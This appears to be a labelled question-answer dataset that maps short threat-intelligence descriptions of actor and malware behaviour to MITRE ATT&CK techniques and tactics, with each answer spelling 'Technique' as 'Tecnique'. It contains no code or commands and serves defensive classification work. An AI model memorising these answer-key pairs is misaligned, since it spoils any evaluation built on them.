+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used web beacons in e-mails to track hits to attacker-controlled URL's.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can send phishing emails containing malicious links designed to collect users’ credentials.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has been delivered via malicious links in phishing emails.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used phone calls to instruct victims to navigate to credential-harvesting websites.","Tecnique: T1598.004 Phishing for Information: Spearphishing Voice, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has called victims' help desk to convince the support personnel to reset a privileged account’s credentials.,"Tecnique: T1598.004 Phishing for Information: Spearphishing Voice, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used phone calls to instruct victims to navigate to credential-harvesting websites.
+
+Scattered Spider has also called employees at target organizations and compelled them to navigate to fake login portals using adversary-in-the-middle toolkits.","Tecnique: T1598.004 Phishing for Information: Spearphishing Voice, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYNful Knock is malware that is inserted into a network device by patching the operating system image.,"Tecnique: T1601.001 Modify System Image: Patch System Image, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.","Tecnique: T1606.001 Forge Web Credentials: Web Cookies, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 created tokens using compromised SAML signing certificates.","Tecnique: T1606.002 Forge Web Credentials: SAML Tokens, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate.,"Tecnique: T1606.002 Forge Web Credentials: SAML Tokens, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims.,"Tecnique: T1608 Stage Capabilities, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0010, UNC3890 actors staged malware on their infrastructure for direct download onto a compromised system.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0011, Transparent Tribe hosted malicious documents on domains registered by the group.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0021, the threat actors uploaded malware to websites under their control.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors uploaded commonly available hacker tools to compromised web servers.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group used compromised servers to host malware.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has registered domains to stage payloads.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has registered domains to stage payloads.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has hosted open-source remote access Trojans used in its operations in GitHub.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has hosted malicious payloads on Dropbox.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has hosted malicious payloads on DropBox including PlugX.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has hosted payloads on acquired second-stage servers for periods of either days, weeks, or months.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has used compromised domains to host its malicious payloads.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has uploaded malware to various platforms including Google Drive, Pastetext, Sharetext, and GitHub.","Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has staged malware on actor-controlled domains.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has uploaded backdoored Docker images to Docker Hub.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has hosted malicious payloads on Dropbox.,"Tecnique: T1608.001 Stage Capabilities: Upload Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.","Tecnique: T1608.002 Stage Capabilities: Upload Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.","Tecnique: T1608.002 Stage Capabilities: Upload Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.","Tecnique: T1608.002 Stage Capabilities: Upload Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0010, the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.","Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has stood up websites containing numerous articles and content scraped from the Internet to make them appear legitimate, but some of these pages include malicious JavaScript to profile the potential victim or infect them via a fake software update.","Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has compromised websites to redirect traffic and to host exploit kits.,"Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has compromised a digital product website and modified multiple download links to point to trojanized versions of offered digital products.,"Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has redirected compromised machines to an actor-controlled webpage through HTML injection.,"Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has injected malicious JavaScript into compromised websites to infect victims via drive-by download.,"Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.,"Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has set up websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.","Tecnique: T1608.004 Stage Capabilities: Drive-by Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has created a link to a Dropbox file that has been used in their spear-phishing operations.,"Tecnique: T1608.005 Stage Capabilities: Link Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. Silent Librarian has also made use of a variety of URL shorteners for these staged websites.,"Tecnique: T1608.005 Stage Capabilities: Link Target, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has poisoned search engine results to return fake software updates in order to distribute malware.,"Tecnique: T1608.006 Stage Capabilities: SEO Poisoning, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.,"Tecnique: T1609 Container Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard was executed through the kubelet API run command and by executing commands on running containers.,"Tecnique: T1609 Container Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing was executed with an Ubuntu container entry point that runs shell scripts.,"Tecnique: T1609 Container Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can use `kubectl` or the Kubernetes API to run commands.,"Tecnique: T1609 Container Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.,"Tecnique: T1609 Container Administration Command, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.,"Tecnique: T1610 Deploy Container, Tactic: TA0005 Defense Evasion TA0002 Execution "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki was run through a deployed container.,"Tecnique: T1610 Deploy Container, Tactic: TA0005 Defense Evasion TA0002 Execution "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing was run through a deployed Ubuntu container.,"Tecnique: T1610 Deploy Container, Tactic: TA0005 Defense Evasion TA0002 Execution "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node.","Tecnique: T1610 Deploy Container, Tactic: TA0005 Defense Evasion TA0002 Execution "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has deployed privileged containers that mount the filesystem of victim machine.,"Tecnique: T1611 Escape to Host, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki’s container was configured to bind the host root directory.,"Tecnique: T1611 Escape to Host, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used the BOtB tool that can break out of containers.,"Tecnique: T1611 Escape to Host, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath.,"Tecnique: T1611 Escape to Host, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape maps the host’s C drive to the container by creating a global symbolic link to the host through the calling of NtSetInformationSymbolicLink.,"Tecnique: T1611 Escape to Host, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has checked for running containers with docker ps and for specific container names with docker inspect. TeamTNT has also searched for Kubernetes pods running in a local network.,"Tecnique: T1613 Container and Resource Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.,"Tecnique: T1613 Container and Resource Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can enumerate Kubernetes pods in a given namespace.,"Tecnique: T1613 Container and Resource Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has identified the country location of a compromised host.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey does not run any tasks or install additional malware if the victim machine is based in Russia.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can identify the geographical location of a victim host.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate queries system locale information during execution. Later versions of DarkGate query GetSystemDefaultLCID for locale information to determine if the malware is executing in Russian-speaking countries.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can identity the OS locale of a compromised host.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can identify the country code on a compromised host.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can determine the country a victim host is located in.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Before executing malicious code, Ragnar Locker checks the Windows API GetLocaleInfoW and doesn't encrypt files if it finds a former Soviet country.","Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot can collected the country code of a compromised machine.,"Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.","Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can use IP-based geolocation to limit infections to victims in North America, Europe, and a small number of Asian-Pacific nations.","Tecnique: T1614 System Location Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used implants to collect the system language ID of a compromised machine.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro will terminate Mispadu's infection process if the language of the victim machine is not Spanish or Portuguese.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the GetTextCharset function.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can check if Russian language is installed on the infected machine by using the function GetKeyboardLayoutList.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some versions of DEATHRANSOM have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar DEATHRANSOM would exit.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook has checked for the presence of Arabic language in the infected machine's settings.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialog.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has used Accept-Language to identify hosts in the United Kingdom, United States, France, and Spain.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can use the GetKeyboardLayout API to check if a compromised host's keyboard is set to Persian.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has checked the language of the machine with function GetUserDefaultUILanguage and terminated execution if the language matches with an entry in the predefined list.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu checks and will terminate execution if the compromised system’s language ID is not Spanish or Portuguese.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can identify the system language on a compromised host.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can check the system language using GetUserDefaultUILanguage and GetSystemDefaultUILanguage. If the language is found in the list, the process terminates.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage. If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423 (Belarusian), it stops execution.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has attempted to determine if a compromised system was using a Japanese keyboard via the `GetKeyboardType` API call.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has checked the results of the GetKeyboardLayoutList and the language name returned by GetLocaleInfoA to make sure they contain the word “Arabic” before executing.,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck lists all the keyboard layouts installed on the victim’s system using GetKeyboardLayoutList API and checks against a hardcoded language code list. If a match if found, SynAck sleeps for 300 seconds and then exits without encrypting files.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses AppleScript to check the host's language and location with the command user locale of (get system info).,"Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.","Tecnique: T1614.001 System Location Discovery: System Language Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover Group Policy details using the gpresult command.,"Tecnique: T1615 Group Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound has the ability to collect local admin information via GPO.,"Tecnique: T1615 Group Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary has the capability to execute gpresult.,"Tecnique: T1615 Group Policy Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire includes various modules for enumerating Group Policy.,"Tecnique: T1615 Group Policy Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can enumerate AWS storage services, such as S3 buckets and Elastic Block Store volumes.","Tecnique: T1619 Cloud Storage Object Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can list AWS S3 buckets.,"Tecnique: T1619 Cloud Storage Object Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.","Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can copy a large byte array of 64-bit shellcode into process memory and execute it with a call to `CreateThread`.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has used reflective loading to execute malicious DLLs.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike's execute-assembly command can run a .NET executable within the memory of a sacrificial process by loading the CLR.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba loaded the payload into memory using PowerShell.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.","Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has reflectively loaded payloads into memory.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb's loader has reflectively loaded .NET-based assembly/payloads into memory.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use custom shellcode to map embedded DLLs into memory.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has reflectively loaded the decoded DLL into memory.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit reflectively loads a Windows PE file into a process.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has a plugin system that can load specially made DLLs into memory and execute their functions.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uses various API functions such as NSCreateObjectFileImageFromMemory to load and link in-memory payloads.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has the ability to load new modules directly into memory using its `Load Modules Mem` command.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate's downloader can reverse its third stage file bytes and reflectively load the file as a .NET assembly.,"Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain has reflectively loaded a DLL to read, decrypt, and load an orchestrator file.","Tecnique: T1620 Reflective Code Loading, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider attempted to gain access by continuously sending MFA messages to the victim until they accept the MFA push challenge.","Tecnique: T1621 Multi-Factor Authentication Request Generation, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used repeated MFA requests to gain access to victim accounts.,"Tecnique: T1621 Multi-Factor Authentication Request Generation, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.,"Tecnique: T1621 Multi-Factor Authentication Request Generation, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has used multifactor authentication (MFA) fatigue by sending repeated MFA authentication requests to targets.,"Tecnique: T1621 Multi-Factor Authentication Request Generation, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used tools that used the `IsDebuggerPresent` call to detect debuggers.","Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can use the `CheckRemoteDebuggerPresent` function to detect the presence of a debugger.,"Tecnique: T1622 Debugger Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
